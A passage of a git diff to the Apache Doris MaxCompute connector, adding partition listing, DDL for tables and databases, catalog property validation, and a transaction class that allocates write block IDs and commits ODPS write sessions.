java.util.Optional; +import java.util.Set; /** * ConnectorMetadata implementation for MaxCompute. @@ -45,16 +63,32 @@ public class MaxComputeConnectorMetadata implements ConnectorMetadata { private static final Logger LOG = LogManager.getLogger( MaxComputeConnectorMetadata.class); + private static final long MAX_LIFECYCLE_DAYS = 37231; + private static final int MAX_BUCKET_NUM = 1024; + // Must stay byte-identical to the key ConnectorSessionBuilder.extractSessionProperties injects + // (GC1 / FIX-BLOCKID-CAP-CONFIG); = the legacy fe-core Config field name, surfaced via session + // properties because the connector cannot import fe-core Config. + private static final String MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT = "max_compute_write_max_block_count"; + private final Odps odps; private final McStructureHelper structureHelper; private final String defaultProject; + private final String endpoint; + private final String quota; + private final Map properties; public MaxComputeConnectorMetadata(Odps odps, McStructureHelper structureHelper, - String defaultProject) { + String defaultProject, + String endpoint, + String quota, + Map properties) { this.odps = odps; this.structureHelper = structureHelper; this.defaultProject = defaultProject; + this.endpoint = endpoint; + this.quota = quota; + this.properties = properties; } @Override @@ -106,24 +140,22 @@ public ConnectorTableSchema getTableSchema(ConnectorSession session, new ArrayList<>(dataColumns.size() + partColumns.size()); for (Column col : dataColumns) { - columns.add(new ConnectorColumn( + columns.add(buildColumn( col.getName(), MCTypeMapping.toConnectorType(col.getTypeInfo()), col.getComment(), - col.isNullable(), - null)); + col.isNullable())); } List partitionColumnNames = new ArrayList<>(partColumns.size()); for (Column partCol : partColumns) { partitionColumnNames.add(partCol.getName()); - columns.add(new ConnectorColumn( + columns.add(buildColumn( partCol.getName(), MCTypeMapping.toConnectorType(partCol.getTypeInfo()), partCol.getComment(), - true, - null)); + true)); } java.util.Map props = new java.util.HashMap<>(); @@ -135,6 +167,19 @@ public ConnectorTableSchema getTableSchema(ConnectorSession session, mcHandle.getTableName(), columns, "MAX_COMPUTE", props); } + /** + * Builds a {@link ConnectorColumn} for a MaxCompute external-table column with + * {@code isKey=true}, mirroring legacy {@code MaxComputeExternalTable.initSchema} (every column + * was a Doris key column). For external (non-OLAP) tables there is no key-based storage; the + * flag drives DESCRIBE's {@code Key} display and the few non-OLAP-guarded planning/BE paths that + * read {@code Column.isKey()} (e.g. predicate inference, slot descriptors) — all of which legacy + * already fed {@code true}, so this restores exact legacy parity. {@code isAutoInc} stays false. + */ + static ConnectorColumn buildColumn(String name, ConnectorType type, String comment, + boolean nullable) { + return new ConnectorColumn(name, type, comment, nullable, null, true); + } + @Override public Map getColumnHandles( ConnectorSession session, ConnectorTableHandle handle) { @@ -152,4 +197,448 @@ public Map getColumnHandles( } return result; } + + /** + * Builds the typed MaxCompute table descriptor for the read path. The BE + * {@code file_scanner} static_casts {@code table_desc()} to + * {@code MaxComputeTableDescriptor} unconditionally for + * {@code table_format_type=="max_compute"}, so the descriptor MUST be + * {@code MAX_COMPUTE_TABLE} with {@code mcTable} set; the null / SCHEMA_TABLE + * fallback would produce type confusion in BE. Mirrors legacy + * {@code MaxComputeExternalTable.toThrift()}. + * + *

{@code project}/{@code table} use the remote-name params: the SPI read + * session also addresses ODPS with remote names, so the descriptor must match + * (see design OQ-7). The 6th ctor arg ({@code dbName}) mirrors legacy and is + * unread by BE for MC reads. Fully-qualified thrift names match the jdbc/es + * overrides and avoid new connector imports.

+ */ + @Override + public org.apache.doris.thrift.TTableDescriptor buildTableDescriptor( + ConnectorSession session, + long tableId, String tableName, String dbName, + String remoteName, int numCols, long catalogId) { + org.apache.doris.thrift.TMCTable tMcTable = new org.apache.doris.thrift.TMCTable(); + tMcTable.setEndpoint(endpoint); + tMcTable.setQuota(quota); + tMcTable.setProject(dbName); + tMcTable.setTable(remoteName); + tMcTable.setProperties(properties); + org.apache.doris.thrift.TTableDescriptor desc = new org.apache.doris.thrift.TTableDescriptor( + tableId, org.apache.doris.thrift.TTableType.MAX_COMPUTE_TABLE, + numCols, 0, tableName, dbName); + desc.setMcTable(tMcTable); + return desc; + } + + // ==================== Partition listing ==================== + + @Override + public List listPartitionNames(ConnectorSession session, + ConnectorTableHandle handle) { + MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle; + List partitions = structureHelper.getPartitions( + odps, mcHandle.getDbName(), mcHandle.getTableName()); + List names = new ArrayList<>(partitions.size()); + for (Partition partition : partitions) { + names.add(partition.getPartitionSpec().toString(false, true)); + } + return names; + } + + /** + * Lists all partitions. The {@code filter} is intentionally ignored: the + * legacy SHOW PARTITIONS path ({@code MaxComputeExternalCatalog + * #listPartitionNames}) returns the full partition set without pushing + * predicates into ODPS, and this preserves that behavior. Partitions are + * read directly from ODPS with no connector-side cache (P4-T02 / OQ-4). + */ + @Override + public List listPartitions(ConnectorSession session, + ConnectorTableHandle handle, Optional filter) { + MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle; + List partitions = structureHelper.getPartitions( + odps, mcHandle.getDbName(), mcHandle.getTableName()); + List result = new ArrayList<>(partitions.size()); + for (Partition partition : partitions) { + PartitionSpec spec = partition.getPartitionSpec(); + Map values = new LinkedHashMap<>(); + for (String key : spec.keys()) { + values.put(key, spec.get(key)); + } + result.add(new ConnectorPartitionInfo( + spec.toString(false, true), values, Collections.emptyMap())); + } + return result; + } + + @Override + public List> listPartitionValues(ConnectorSession session, + ConnectorTableHandle handle, List partitionColumns) { + MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle; + List partitions = structureHelper.getPartitions( + odps, mcHandle.getDbName(), mcHandle.getTableName()); + List> result = new ArrayList<>(partitions.size()); + for (Partition partition : partitions) { + PartitionSpec spec = partition.getPartitionSpec(); + List values = new ArrayList<>(partitionColumns.size()); + for (String column : partitionColumns) { + values.add(spec.get(column)); + } + result.add(values); + } + return result; + } + + // ==================== Write / Transaction (P4-T03 / P4-T04) ==================== + + /** + * Declares INSERT support so the engine routes MaxCompute writes through the + * plugin-driven sink path. The sink is built by + * {@link MaxComputeWritePlanProvider#planWrite} (P4-T04) and commit is driven by + * {@link MaxComputeConnectorTransaction#commit()} through the SPI transaction + * lifecycle, so the {@code beginInsert} / {@code finishInsert} / {@code getWriteConfig} + * hooks carry no MaxCompute-specific work and intentionally stay the throwing + * defaults; the exact executor call surface is settled at the cutover (Batch C). + */ + @Override + public boolean supportsInsert() { + return true; + } + + @Override + public boolean supportsInsertOverwrite() { + // MaxCompute honors overwrite end-to-end: MaxComputeWritePlanProvider sets + // builder.overwrite(true) on the write session when the sink requests it. + return true; + } + + /** + * Disables pushing predicates that contain implicit CAST expressions down to ODPS (F9 fix). + * + *

The shared {@code ExprToConnectorExpressionConverter} unwraps CAST shells, so without this + * a predicate like {@code CAST(str_col AS INT) = 5} would be pushed to the ODPS read session as + * the source-side filter {@code str_col = "5"} (quoted by the column's STRING type), which ODPS + * evaluates as exact string equality and drops rows like {@code "05"}/{@code " 5"} at the + * source — silent data loss, because BE re-evaluation can only filter the returned rows down, + * never recover rows ODPS never returned. Returning {@code false} makes + * {@code PluginDrivenScanNode.buildRemainingFilter} strip CAST-bearing conjuncts before pushdown + * (they stay BE-only), restoring legacy parity: legacy {@code MaxComputeScanNode} likewise never + * pushed CAST predicates (its {@code convertSlotRefToColumnName} threw on a CAST operand and the + * conjunct was dropped). Mirrors {@code JdbcConnectorMetadata} and the contract documented on + * {@link org.apache.doris.connector.api.ConnectorPushdownOps#supportsCastPredicatePushdown}. + */ + @Override + public boolean supportsCastPredicatePushdown(ConnectorSession session) { + return false; + } + + /** + * MaxCompute uses the SPI transaction model: the engine opens a + * {@link MaxComputeConnectorTransaction} via {@link #beginTransaction} and binds it to + * the session; the write plan ({@code MaxComputeWritePlanProvider.planWrite}) attaches the + * ODPS write session to it. So the executor routes through the transaction model rather + * than the {@code beginInsert} / {@code finishInsert} handle model (which stays throwing-default). + */ + @Override + public boolean usesConnectorTransaction() { + return true; + } + + /** + * Opens a connector transaction for a MaxCompute write statement. The + * transaction id is the engine-side id allocated through the session, so it + * matches the id registered in the engine transaction registry and stamped + * into the data sink (see {@link MaxComputeConnectorTransaction}). + * + *

Gate-closed / dormant until the {@code max_compute} cutover: nothing + * routes plugin-driven MaxCompute writes through this path yet. The ODPS + * write session that backs commit / block allocation is created by the write + * plan (P4-T04), which binds it via + * {@link MaxComputeConnectorTransaction#setWriteSession}.

+ */ + @Override + public ConnectorTransaction beginTransaction(ConnectorSession session) { + long maxBlockCount = resolveMaxBlockCount(session.getSessionProperties()); + return new MaxComputeConnectorTransaction(session.allocateTransactionId(), maxBlockCount); + } + + /** + * Resolves the write block-id cap from the session properties, into which fe-core's + * {@code ConnectorSessionBuilder} surfaces the (tunable) + * {@code Config.max_compute_write_max_block_count} (the connector cannot import fe-core + * {@code Config}). Falls back to the legacy default when the value is absent or unparseable, + * so any path without the injected value keeps the current behavior. Package-private + + * map-typed for direct unit testing without a live session. + */ + static long resolveMaxBlockCount(Map sessionProperties) { + String value = sessionProperties.get(MAX_COMPUTE_WRITE_MAX_BLOCK_COUNT); + if (value == null) { + return MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT; + } + try { + return Long.parseLong(value.trim()); + } catch (NumberFormatException e) { + return MaxComputeConnectorTransaction.DEFAULT_MAX_BLOCK_COUNT; + } + } + + // ==================== DDL: Create/Drop Table ==================== + + @Override + public void createTable(ConnectorSession session, + ConnectorCreateTableRequest request) { + String dbName = request.getDbName(); + String tableName = request.getTableName(); + + if (structureHelper.tableExist(odps, dbName, tableName)) { + if (request.isIfNotExists()) { + LOG.info("create table[{}.{}] which already exists", + dbName, tableName); + return; + } + throw new DorisConnectorException("Table '" + tableName + + "' already exists in database '" + dbName + "'"); + } + + List columns = request.getColumns(); + validateColumns(columns); + List partitionColumns = + identityPartitionColumns(request.getPartitionSpec()); + TableSchema schema = buildSchema(columns, partitionColumns); + + Long lifecycle = extractLifecycle(request.getProperties()); + Map mcProperties = + extractMaxComputeProperties(request.getProperties()); + Integer bucketNum = extractBucketNum(request.getBucketSpec()); + + Tables.TableCreator creator = structureHelper.createTableCreator( + odps, dbName, tableName, schema); + if (request.isIfNotExists()) { + creator.ifNotExists(); + } + String comment = request.getComment(); + if (comment != null && !comment.isEmpty()) { + creator.withComment(comment); + } + if (lifecycle != null) { + creator.withLifeCycle(lifecycle); + } + if (!mcProperties.isEmpty()) { + creator.withTblProperties(mcProperties); + } + if (bucketNum != null) { + creator.withDeltaTableBucketNum(bucketNum); + } + + try { + creator.create(); + } catch (OdpsException e) { + throw new DorisConnectorException("Failed to create MaxCompute table '" + + tableName + "': " + e.getMessage(), e); + } + LOG.info("created MaxCompute table {}.{}", dbName, tableName); + } + + /** + * Drops the table behind {@code handle}. The SPI signature carries no + * {@code ifExists}; fe-core resolves the handle (absent when the table does + * not exist) before routing here, so the remote drop is issued idempotently. + */ + @Override + public void dropTable(ConnectorSession session, + ConnectorTableHandle handle) { + MaxComputeTableHandle mcHandle = (MaxComputeTableHandle) handle; + String dbName = mcHandle.getDbName(); + String tableName = mcHandle.getTableName(); + try { + structureHelper.dropTable(odps, dbName, tableName, true); + } catch (OdpsException e) { + throw new DorisConnectorException("Failed to drop MaxCompute table '" + + tableName + "': " + e.getMessage(), e); + } + LOG.info("dropped MaxCompute table {}.{}", dbName, tableName); + } + + // ==================== DDL: Create/Drop Database ==================== + + @Override + public boolean supportsCreateDatabase() { + return true; + } + + @Override + public void createDatabase(ConnectorSession session, String dbName, + Map properties) { + structureHelper.createDb(odps, dbName, false); + LOG.info("created MaxCompute database {}", dbName); + } + + @Override + public void dropDatabase(ConnectorSession session, String dbName, + boolean ifExists, boolean force) { + if (force) { + // ODPS schemas().delete() does NOT auto-cascade; enumerate and drop each + // table first (mirrors legacy MaxComputeMetadataOps.dropDbImpl force branch, + // whose enumerate-loop is itself proof that the schema delete won't cascade). + for (String tableName : structureHelper.listTableNames(odps, dbName)) { + try { + structureHelper.dropTable(odps, dbName, tableName, true); + } catch (OdpsException e) { + throw new DorisConnectorException("Failed to drop MaxCompute table '" + + tableName + "' during force-drop of database '" + dbName + + "': " + e.getMessage(), e); + } + } + } + structureHelper.dropDb(odps, dbName, ifExists); + LOG.info("dropped MaxCompute database {} (force={})", dbName, force); + } + + // ==================== DDL helpers ==================== + + // package-private for unit test; reached only via createTable() in production. + void validateColumns(List columns) { + if (columns == null || columns.isEmpty()) { + throw new DorisConnectorException( + "Table must have at least one column."); + } + Set seen = new HashSet<>(); + for (ConnectorColumn col : columns) { + // MaxCompute cannot store auto-increment columns; reject them with the same message + // as legacy MaxComputeMetadataOps.validateColumns (silent drop is a data-model + // regression -- the user's AUTO_INCREMENT intent would be lost without warning). + if (col.isAutoInc()) { + throw new DorisConnectorException( + "Auto-increment columns are not supported for MaxCompute tables: " + + col.getName()); + } + // MaxCompute has no aggregate-key model; reject aggregate columns (e.g. SUM/REPLACE), + // mirroring legacy MaxComputeMetadataOps.validateColumns:426-429. The nereids non-OLAP + // path does not reject these (validateKeyColumns is ENGINE_OLAP-gated), so without this + // the user's aggregate intent is silently dropped to a plain column. + if (col.isAggregated()) { + throw new DorisConnectorException( + "Aggregation columns are not supported for MaxCompute tables: " + + col.getName()); + } + if (!seen.add(col.getName().toLowerCase())) { + throw new DorisConnectorException( + "Duplicate column name: " + col.getName()); + } + // Validate the type is representable in MaxCompute (throws otherwise). + MCTypeMapping.toMcType(col.getType()); + } + } + + /** + * Extracts the identity partition column names, rejecting transform-based + * partitioning (MaxCompute supports identity partitions only). Mirrors the + * legacy {@code MaxComputeMetadataOps.validatePartitionDesc}. + */ + private List identityPartitionColumns( + ConnectorPartitionSpec partitionSpec) { + List names = new ArrayList<>(); + if (partitionSpec == null) { + return names; + } + for (ConnectorPartitionField field : partitionSpec.getFields()) { + if (!"identity".equalsIgnoreCase(field.getTransform())) { + throw new DorisConnectorException( + "MaxCompute does not support partition transform '" + + field.getTransform() + + "'. Only identity partitions are supported."); + } + names.add(field.getColumnName()); + } + return names; + } + + private TableSchema buildSchema(List columns, + List partitionColumns) { + Set partitionColLower = new HashSet<>(); + for (String name : partitionColumns) { + partitionColLower.add(name.toLowerCase()); + } + + TableSchema schema = new TableSchema(); + for (ConnectorColumn col : columns) { + if (!partitionColLower.contains(col.getName().toLowerCase())) { + schema.addColumn(new Column(col.getName(), + MCTypeMapping.toMcType(col.getType()), col.getComment())); + } + } + for (String partColName : partitionColumns) { + ConnectorColumn col = findColumnByName(columns, partColName); + if (col == null) { + throw new DorisConnectorException("Partition column '" + + partColName + "' not found in column definitions."); + } + schema.addPartitionColumn(new Column(col.getName(), + MCTypeMapping.toMcType(col.getType()), col.getComment())); + } + return schema; + } + + private ConnectorColumn findColumnByName(List columns, + String name) { + for (ConnectorColumn col : columns) { + if (col.getName().equalsIgnoreCase(name)) { + return col; + } + } + return null; + } + + private Long extractLifecycle(Map properties) { + String lifecycleStr = properties.get("mc.lifecycle"); + if (lifecycleStr == null) { + lifecycleStr = properties.get("lifecycle"); + } + if (lifecycleStr == null) { + return null; + } + try { + long lifecycle = Long.parseLong(lifecycleStr); + if (lifecycle <= 0 || lifecycle > MAX_LIFECYCLE_DAYS) { + throw new DorisConnectorException("Invalid lifecycle value: " + + lifecycle + ". Must be between 1 and " + + MAX_LIFECYCLE_DAYS + "."); + } + return lifecycle; + } catch (NumberFormatException e) { + throw new DorisConnectorException("Invalid lifecycle value: '" + + lifecycleStr + "'. Must be a positive integer."); + } + } + + private Map extractMaxComputeProperties( + Map properties) { + Map mcProperties = new HashMap<>(); + for (Map.Entry entry : properties.entrySet()) { + if (entry.getKey().startsWith("mc.tblproperty.")) { + mcProperties.put( + entry.getKey().substring("mc.tblproperty.".length()), + entry.getValue()); + } + } + return mcProperties; + } + + private Integer extractBucketNum(ConnectorBucketSpec bucketSpec) { + if (bucketSpec == null) { + return null; + } + if (!"doris_default".equals(bucketSpec.getAlgorithm())) { + throw new DorisConnectorException( + "MaxCompute only supports hash distribution. Got: " + + bucketSpec.getAlgorithm()); + } + int bucketNum = bucketSpec.getNumBuckets(); + if (bucketNum <= 0 || bucketNum > MAX_BUCKET_NUM) { + throw new DorisConnectorException("Invalid bucket number: " + + bucketNum + ". Must be between 1 and " + MAX_BUCKET_NUM + "."); + } + return bucketNum; + } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProvider.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProvider.java index f6593b9f30a7c0..07affd6a03427d 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProvider.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorProvider.java @@ -21,6 +21,8 @@ import org.apache.doris.connector.spi.ConnectorContext; import org.apache.doris.connector.spi.ConnectorProvider; +import java.util.Arrays; +import java.util.List; import java.util.Map; /** @@ -28,6 +30,12 @@ */ public class MaxComputeConnectorProvider implements ConnectorProvider { + private static final List REQUIRED_PROPERTIES = Arrays.asList( + MCConnectorProperties.PROJECT, + MCConnectorProperties.ENDPOINT); + + private static final long MIN_SPLIT_BYTE_SIZE = 10485760L; + @Override public String getType() { return "max_compute"; @@ -38,4 +46,105 @@ public Connector create(Map properties, ConnectorContext context) { return new MaxComputeDorisConnector(properties, context); } + + /** + * Validates catalog properties at CREATE CATALOG time, mirroring the fail-fast + * checks of the legacy {@code MaxComputeExternalCatalog.checkProperties}: required + * PROJECT/ENDPOINT, split strategy + size floor, account_format enum, positive + * connect/read timeout and retry count, and authentication completeness. Throws + * {@link IllegalArgumentException}, which the caller + * ({@code PluginDrivenExternalCatalog.checkProperties}) wraps into a DdlException. + */ + @Override + public void validateProperties(Map properties) { + // 1. Required properties: PROJECT + ENDPOINT (literal keys, mirroring legacy + // REQUIRED_PROPERTIES; region/odps_endpoint/tunnel_endpoint are replay-only + // backward-compat fallbacks, not valid for a new CREATE). + for (String required : REQUIRED_PROPERTIES) { + if (!properties.containsKey(required)) { + throw new IllegalArgumentException( + "Required property '" + required + "' is missing"); + } + } + + // 2. Split strategy and size/count floor. + String splitStrategy = properties.getOrDefault( + MCConnectorProperties.SPLIT_STRATEGY, + MCConnectorProperties.DEFAULT_SPLIT_STRATEGY); + try { + if (splitStrategy.equals( + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)) { + long splitByteSize = Long.parseLong(properties.getOrDefault( + MCConnectorProperties.SPLIT_BYTE_SIZE, + MCConnectorProperties.DEFAULT_SPLIT_BYTE_SIZE)); + if (splitByteSize < MIN_SPLIT_BYTE_SIZE) { + throw new IllegalArgumentException( + MCConnectorProperties.SPLIT_BYTE_SIZE + + " must be greater than or equal to " + + MIN_SPLIT_BYTE_SIZE); + } + } else if (splitStrategy.equals( + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY)) { + long splitRowCount = Long.parseLong(properties.getOrDefault( + MCConnectorProperties.SPLIT_ROW_COUNT, + MCConnectorProperties.DEFAULT_SPLIT_ROW_COUNT)); + if (splitRowCount <= 0) { + throw new IllegalArgumentException( + MCConnectorProperties.SPLIT_ROW_COUNT + + " must be greater than 0"); + } + } else { + throw new IllegalArgumentException( + "property " + MCConnectorProperties.SPLIT_STRATEGY + + " must be " + + MCConnectorProperties.SPLIT_BY_BYTE_SIZE_STRATEGY + + " or " + + MCConnectorProperties.SPLIT_BY_ROW_COUNT_STRATEGY); + } + } catch (NumberFormatException e) { + throw new IllegalArgumentException( + "property " + MCConnectorProperties.SPLIT_BYTE_SIZE + "/" + + MCConnectorProperties.SPLIT_ROW_COUNT + + " must be an integer"); + } + + // 3. Account format enum: name | id. + String accountFormat = properties.getOrDefault( + MCConnectorProperties.ACCOUNT_FORMAT, + MCConnectorProperties.DEFAULT_ACCOUNT_FORMAT); + if (!accountFormat.equals(MCConnectorProperties.ACCOUNT_FORMAT_NAME) + && !accountFormat.equals( + MCConnectorProperties.ACCOUNT_FORMAT_ID)) { + throw new IllegalArgumentException( + "property " + MCConnectorProperties.ACCOUNT_FORMAT + + " only support name and id"); + } + + // 4. Positive connect/read timeout and retry count. + checkPositiveInt(properties, MCConnectorProperties.CONNECT_TIMEOUT, + MCConnectorProperties.DEFAULT_CONNECT_TIMEOUT); + checkPositiveInt(properties, MCConnectorProperties.READ_TIMEOUT, + MCConnectorProperties.DEFAULT_READ_TIMEOUT); + checkPositiveInt(properties, MCConnectorProperties.RETRY_COUNT, + MCConnectorProperties.DEFAULT_RETRY_COUNT); + + // 5. Authentication completeness (wires the otherwise-unused + // MCConnectorClientFactory.checkAuthProperties). + MCConnectorClientFactory.checkAuthProperties(properties); + } + + private static void checkPositiveInt(Map properties, + String key, String defaultValue) { + int value; + try { + value = Integer.parseInt(properties.getOrDefault(key, defaultValue)); + } catch (NumberFormatException e) { + throw new IllegalArgumentException( + "property " + key + " must be an integer"); + } + if (value <= 0) { + throw new IllegalArgumentException( + key + " must be greater than 0"); + } + } } diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java new file mode 100644 index 00000000000000..ce14206326371d --- /dev/null +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeConnectorTransaction.java @@ -0,0 +1,231 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.maxcompute; + +import org.apache.doris.connector.api.DorisConnectorException; +import org.apache.doris.connector.api.handle.ConnectorTransaction; +import org.apache.doris.thrift.TMCCommitData; + +import com.aliyun.odps.table.TableIdentifier; +import com.aliyun.odps.table.enviroment.EnvironmentSettings; +import com.aliyun.odps.table.write.TableBatchWriteSession; +import com.aliyun.odps.table.write.TableWriteSessionBuilder; +import com.aliyun.odps.table.write.WriterCommitMessage; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; +import org.apache.thrift.TDeserializer; +import org.apache.thrift.TException; +import org.apache.thrift.protocol.TBinaryProtocol; + +import java.io.ByteArrayInputStream; +import java.io.IOException; +import java.io.ObjectInputStream; +import java.util.ArrayList; +import java.util.Base64; +import java.util.List; +import java.util.concurrent.atomic.AtomicLong; + +/** + * MaxCompute connector transaction (ports the legacy + * {@code org.apache.doris.datasource.maxcompute.MCTransaction} write lifecycle + * to the connector SPI). + * + *

Holds the per-statement write state: accumulated commit fragments + * ({@link TMCCommitData}, fed back from BE via {@link #addCommitData}), the + * block-id high-water mark, and — once the write plan (P4-T04) creates the ODPS + * write session — the session id / target identifier / environment settings used + * by {@link #commit()}.

+ * + *

Gate-closed / dormant. Nothing routes plugin-driven MaxCompute writes + * through this class until the {@code max_compute} cutover: the executor wiring + * ({@code beginTransaction} → {@code PluginDrivenTransactionManager.begin}) + * and {@code GlobalExternalTransactionInfoMgr} registration are deferred to that + * step. {@link #commit()} depends on the write-session state populated by P4-T04 + * (via {@link #setWriteSession}); it is intentionally not runnable before then.

+ */ +public class MaxComputeConnectorTransaction implements ConnectorTransaction { + + private static final Logger LOG = LogManager.getLogger( + MaxComputeConnectorTransaction.class); + + /** + * Legacy default of {@code Config.max_compute_write_max_block_count} (20000); used as the + * fallback when the session does not carry the (tunable) value. The connector cannot import + * fe-core {@code Config}, so the live value is threaded in through the constructor — resolved + * from {@link org.apache.doris.connector.api.ConnectorSession#getSessionProperties()} by + * {@code MaxComputeConnectorMetadata.resolveMaxBlockCount} (GC1 / FIX-BLOCKID-CAP-CONFIG, + * restoring legacy fe.conf tunability and superseding the hardcoded cap in DV-011). + */ + static final long DEFAULT_MAX_BLOCK_COUNT = 20000L; + + private final long transactionId; + /** Upper bound on allocatable block ids; = Config.max_compute_write_max_block_count (per session). */ + private final long maxBlockCount; + private final List commitDataList = new ArrayList<>(); + private final AtomicLong nextBlockId = new AtomicLong(0); + + // Write-session state, populated by the write plan (P4-T04) before commit. + private volatile String writeSessionId; + private volatile TableIdentifier tableIdentifier; + private volatile EnvironmentSettings settings; + + public MaxComputeConnectorTransaction(long transactionId, long maxBlockCount) { + this.transactionId = transactionId; + this.maxBlockCount = maxBlockCount; + } + + /** + * Binds the ODPS write session created by the write plan (P4-T04) so that + * block allocation and {@link #commit()} can act on it. Resets the block-id + * high-water mark to the start of the new session. + */ + public void setWriteSession(String writeSessionId, TableIdentifier tableIdentifier, + EnvironmentSettings settings) { + this.writeSessionId = writeSessionId; + this.tableIdentifier = tableIdentifier; + this.settings = settings; + this.nextBlockId.set(0); + } + + public String getWriteSessionId() { + return writeSessionId; + } + + @Override + public long getTransactionId() { + return transactionId; + } + + @Override + public void addCommitData(byte[] commitFragment) { + TMCCommitData data = new TMCCommitData(); + try { + new TDeserializer(new TBinaryProtocol.Factory()).deserialize(data, commitFragment); + } catch (TException e) { + throw new DorisConnectorException("failed to deserialize MaxCompute commit data", e); + } + synchronized (this) { + commitDataList.add(data); + } + } + + @Override + public boolean supportsWriteBlockAllocation() { + return true; + } + + @Override + public long allocateWriteBlockRange(String requestWriteSessionId, long count) { + if (count <= 0) { + throw new DorisConnectorException( + "MaxCompute block_id allocation length must be positive: " + count); + } + if (writeSessionId == null || writeSessionId.isEmpty()) { + throw new DorisConnectorException("MaxCompute write session has not been initialized"); + } + if (!writeSessionId.equals(requestWriteSessionId)) { + throw new DorisConnectorException("MaxCompute write session mismatch, expected=" + + writeSessionId + ", actual=" + requestWriteSessionId); + } + + long start; + long endExclusive; + do { + start = nextBlockId.get(); + endExclusive = start + count; + if (endExclusive > maxBlockCount) { + throw new DorisConnectorException("MaxCompute block_id exceeds limit, start=" + + start + ", length=" + count + ", maxBlockCount=" + maxBlockCount); + } + } while (!nextBlockId.compareAndSet(start, endExclusive)); + + LOG.info("Allocated MaxCompute block_id range: sessionId={}, start={}, length={}", + writeSessionId, start, count); + return start; + } + + @Override + public long getUpdateCnt() { + return commitDataList.stream().mapToLong(TMCCommitData::getRowCount).sum(); + } + + @Override + public void commit() { + try { + List allMessages = new ArrayList<>(); + synchronized (this) { + for (TMCCommitData data : commitDataList) { + if (data.isSetCommitMessage() && !data.getCommitMessage().isEmpty()) { + appendCommitMessages(allMessages, data.getCommitMessage()); + } + } + } + + TableBatchWriteSession commitSession = new TableWriteSessionBuilder() + .identifier(tableIdentifier) + .withSessionId(writeSessionId) + .withSettings(settings) + .buildBatchWriteSession(); + commitSession.commit(allMessages.toArray(new WriterCommitMessage[0])); + + LOG.info("Committed MaxCompute write session {} with {} messages", + writeSessionId, allMessages.size()); + } catch (Exception e) { + throw new DorisConnectorException( + "Failed to commit MaxCompute write session: " + e.getMessage(), e); + } + } + + @Override + public void rollback() { + // MaxCompute write sessions auto-expire if not committed; no explicit rollback needed. + LOG.info("MaxCompute transaction {} rollback called; uncommitted sessions will auto-expire.", + transactionId); + } + + @Override + public void close() { + // No resources to release: the ODPS write session auto-expires if not committed. + } + + private void appendCommitMessages(List allMessages, String encodedCommitMessage) + throws IOException, ClassNotFoundException { + byte[] bytes = Base64.getDecoder().decode(encodedCommitMessage); + Object payload; + try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) { + payload = ois.readObject(); + } + + if (payload instanceof WriterCommitMessage) { + allMessages.add((WriterCommitMessage) payload); + return; + } + if (payload instanceof List) { + for (Object item : (List) payload) { + if (!(item instanceof WriterCommitMessage)) { + throw new DorisConnectorException("Unexpected MaxCompute commit payload item type: " + + (item == null ? "null" : item.getClass().getName())); + } + allMessages.add((WriterCommitMessage) item); + } + return; + } + throw new DorisConnectorException("Unexpected MaxCompute commit payload type: " + + (payload == null ? "null" : payload.getClass().getName())); + } +} diff --git a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeDorisConnector.java b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeDorisConnector.java index f7ae12ec396f6b..a69d0102067ff9 100644 --- a/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeDorisConnector.java +++ b/fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeDorisConnector.java @@ -18,26 +18,36 @@ package org.apache.doris.connector.maxcompute; import org.apache.doris.connector.api.Connector; +import org.apache.doris.connector.api.ConnectorCapability; import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; import org.apache.doris.connector.api.ConnectorTestResult; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; +import org.apache.doris.connector.api.write.ConnectorWritePlanProvider; import org.apache.doris.connector.spi.ConnectorContext; import com.aliyun.odps.Odps; +import com.aliyun.odps.OdpsException; import com.aliyun.odps.account.AccountFormat; +import com.aliyun.odps.table.configuration.RestOptions; +import com.aliyun.odps.table.enviroment.Credentials; +import com.aliyun.odps.table.enviroment.EnvironmentSettings; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.io.IOException; +import java.util.EnumSet; import java.util.Map; +import java.util.Set; /** * Main Connector implementation for MaxCompute (ODPS). * Manages the Odps client lifecycle and provides metadata access. * - *

